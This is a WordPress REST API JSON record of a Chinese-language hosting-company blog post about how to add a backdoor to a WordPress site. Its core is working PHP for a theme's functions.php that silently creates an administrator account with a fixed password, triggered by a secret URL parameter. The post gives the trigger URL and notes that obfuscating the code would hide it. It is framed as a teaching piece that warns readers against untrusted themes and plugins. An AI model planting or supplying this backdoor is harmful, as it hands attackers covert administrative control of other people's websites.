{"id":361,"date":"2016-01-14T22:53:57","date_gmt":"2016-01-14T14:53:57","guid":{"rendered":"http:\/\/cn.hostease.com\/xueyuan\/?p=361"},"modified":"2016-01-14T22:53:57","modified_gmt":"2016-01-14T14:53:57","slug":"%e5%a6%82%e4%bd%95%e5%9c%a8-wordpress-%e7%ab%99%e7%82%b9%e5%88%9b%e5%bb%ba%e5%90%8e%e9%97%a8","status":"publish","type":"post","link":"https:\/\/cn.hostease.com\/xueyuan\/jishu\/chengxujiaoben\/wordpress\/%e5%a6%82%e4%bd%95%e5%9c%a8-wordpress-%e7%ab%99%e7%82%b9%e5%88%9b%e5%bb%ba%e5%90%8e%e9%97%a8\/","title":{"rendered":"\u5982\u4f55\u5728 WordPress \u7ad9\u70b9\u521b\u5efa\u540e\u95e8"},"content":{"rendered":"<p>\u3000\u662f\u4e0d\u662f\u5728\u5f88\u591a\u573a\u5408\u542c\u8bf4\u8fc7\u540e\u95e8\uff08Backdoor\uff09\uff0c\u7279\u522b\u662f\u4e00\u4e9b\u9ad8\u79d1\u6280\u7684\u7535\u5f71\u91cc\u9762\uff0c\u90a3\u4e9b\u7cfb\u7edf\u6216\u8005\u7a0b\u5e8f\u7684\u4f5c\u8005\u90fd\u4f1a\u901a\u8fc7\u81ea\u5df1\u7559\u4e0b\u7684\u540e\u95e8\u6765\u62ef\u6551\u4e16\u754c\u3002\u5176\u5b9e \u7a0b\u5e8f\u7684\u540e\u95e8\u7559\u6211\u4eec\u6839\u672c\u4e0d\u8fdc\uff0c\u5176\u5b9e\u4f60\u7528\u7684\u5f88\u591a\u8f6f\u4ef6\u6216\u8005\u7a0b\u5e8f\u90fd\u662f\u6709\u540e\u95e8\u7684\uff0c\u4e0b\u9762\u7ed9\u5927\u5bb6\u6f14\u793a\u7684\u4e00\u4e2a\u5f88\u7b80\u5355\u7684\u6848\u4f8b\uff0c\u5c31\u53ef\u4ee5\u7ed9 WordPress \u7ad9\u70b9\u7559\u4e0b\u540e\u95e8\uff0c\u83b7\u53d6\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5f53\u7136\u8fd9\u53ea\u662f\u4e00\u7bc7\u6559\u5b66\u6587\u7ae0\uff0c\u4e2a\u4eba\u5f3a\u70c8\u4f60\u5728\u4f7f\u7528 WordPress \u5e2e\u4eba\u4f5c\u7f51\u7ad9\u7684\u65f6\u5019\uff0c\u5343\u4e07\u4e0d\u8981\u8fd9\u6837\u505a\u3002<\/p>\n<pre class=\"sh_php sh_sourceCode\"><span class=\"sh_symbol\">&lt;?php<\/span>\r\n<span class=\"sh_function\">add_action<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_string\">'wp_head'<\/span><span class=\"sh_symbol\">,<\/span> <span class=\"sh_string\">'my_backdoor'<\/span> <span class=\"sh_symbol\">);<\/span>\r\n \r\n<span class=\"sh_keyword\">function<\/span> <span class=\"sh_function\">my_backdoor<\/span><span class=\"sh_symbol\">()<\/span> <span class=\"sh_cbracket\">{<\/span>\r\n    <span class=\"sh_keyword\">if<\/span> <span class=\"sh_symbol\">(<\/span> <span class=\"sh_function\">md5<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_variable\">$_GET<\/span><span class=\"sh_symbol\">[<\/span><span class=\"sh_string\">'backdoor'<\/span><span class=\"sh_symbol\">]<\/span> <span class=\"sh_symbol\">)<\/span> <span class=\"sh_symbol\">==<\/span> <span class=\"sh_string\">'34d1f91fb2e514b8576fab1a75a89a6b'<\/span> <span class=\"sh_symbol\">)<\/span> <span class=\"sh_cbracket\">{<\/span>\r\n        <span class=\"sh_preproc\">require<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_string\">'wp-includes\/registration.php'<\/span> <span class=\"sh_symbol\">);<\/span>\r\n        <span class=\"sh_keyword\">if<\/span> <span class=\"sh_symbol\">(<\/span> <span class=\"sh_symbol\">!<\/span><span class=\"sh_function\">username_exists<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_string\">'backdoor'<\/span> <span class=\"sh_symbol\">)<\/span> <span class=\"sh_symbol\">)<\/span> <span class=\"sh_cbracket\">{<\/span>\r\n            <span class=\"sh_variable\">$user_id<\/span> <span class=\"sh_symbol\">=<\/span> <span class=\"sh_function\">wp_create_user<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_string\">'backdoor'<\/span><span class=\"sh_symbol\">,<\/span> <span class=\"sh_string\">'pa55w0rd!'<\/span> <span class=\"sh_symbol\">);<\/span>\r\n            <span class=\"sh_variable\">$user<\/span> <span class=\"sh_symbol\">=<\/span> <span class=\"sh_keyword\">new<\/span> <span class=\"sh_function\">WP_User<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_variable\">$user_id<\/span> <span class=\"sh_symbol\">);<\/span>\r\n            <span class=\"sh_variable\">$user<\/span><span class=\"sh_symbol\">-&gt;<\/span><span class=\"sh_function\">set_role<\/span><span class=\"sh_symbol\">(<\/span> <span class=\"sh_string\">'administrator'<\/span> <span class=\"sh_symbol\">);<\/span> \r\n        <span class=\"sh_cbracket\">}<\/span>\r\n    <span class=\"sh_cbracket\">}<\/span>\r\n<span class=\"sh_cbracket\">}<\/span><\/pre>\n<p>\u3000\u3000\u6bd4\u5982\u5728\u4e3b\u9898\u7684 functions.php \u6587\u4ef6\u4e2d\u6dfb\u52a0\u4ee5\u4e0a\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u7ed9 WordPress \u6dfb\u52a0\u4e00\u4e2a\u80fd\u591f\u521b\u5efa\u7ba1\u7406\u5458\u7684\u540e\u95e8\uff0c\u53ea\u9700\u8bbf\u95ee https:\/\/www.yoursitename.com\/?backdoor=go\uff0c\u7136\u540e\u5c31\u521b\u5efa\u4e86\u4e00\u4e2a\u7528\u6237\u540d\u4e3a\u201cbackdoor\u201d\uff0c\u5bc6\u7801 \u4e3a\uff1a\u201cpa55w0rd!\u201d \u7684\u7ba1\u7406\u5458\u3002<\/p>\n<p>\u3000\u3000\u5982\u679c\u5728\u628a\u4e0a\u9762\u8fd9\u6bb5\u4ee3\u7801\u52a0\u5bc6\u4e00\u4e0b\uff0c\u5f88\u591a\u7528\u6237\u5c31\u6839\u672c\u4e0d\u77e5\u9053\u8fd9\u6bb5\u4ee3\u7801\u662f\u505a\u4ec0\u4e48\u7684\uff0c\u6240\u4ee5\u5f3a\u70c8\u5efa\u8bae\u5927\u5bb6\u4e0d\u8981\u968f\u4fbf\u53bb\u4e0b\u8f7d\u4e00\u4e9b\u6765\u8def\u4e0d\u660e\u7684 WordPress \u4e3b\u9898\u548c\u63d2\u4ef6\uff0c\u8bf4\u4e0d\u5b9a\u5c31\u7ed9\u4f60\u7684\u7ad9\u70b9\u5b89\u88c5\u4e86\u4e00\u4e2a\u540e\u95e8<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u3000\u662f\u4e0d\u662f\u5728\u5f88\u591a\u573a\u5408\u542c\u8bf4\u8fc7\u540e\u95e8\uff08Backdoor\uff09\uff0c\u7279\u522b\u662f\u4e00\u4e9b\u9ad8\u79d1\u6280\u7684\u7535\u5f71\u91cc\u9762\uff0c\u90a3\u4e9b\u7cfb\u7edf\u6216\u8005\u7a0b\u5e8f\u7684\u4f5c\u8005\u90fd\u4f1a\u901a\u8fc7\u81ea &#8230; <a title=\"\u5982\u4f55\u5728 WordPress \u7ad9\u70b9\u521b\u5efa\u540e\u95e8\" class=\"read-more\" href=\"https:\/\/cn.hostease.com\/xueyuan\/jishu\/chengxujiaoben\/wordpress\/%e5%a6%82%e4%bd%95%e5%9c%a8-wordpress-%e7%ab%99%e7%82%b9%e5%88%9b%e5%bb%ba%e5%90%8e%e9%97%a8\/\" aria-label=\"\u9605\u8bfb \u5982\u4f55\u5728 WordPress \u7ad9\u70b9\u521b\u5efa\u540e\u95e8\">\u9605\u8bfb\u66f4\u591a<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[14],"tags":[],"class_list":["post-361","post","type-post","status-publish","format-standard","hentry","category-wordpress"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/posts\/361","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/comments?post=361"}],"version-history":[{"count":1,"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/posts\/361\/revisions"}],"predecessor-version":[{"id":362,"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/posts\/361\/revisions\/362"}],"wp:attachment":[{"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/media?parent=361"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/categories?post=361"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cn.hostease.com\/xueyuan\/wp-json\/wp\/v2\/tags?post=361"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}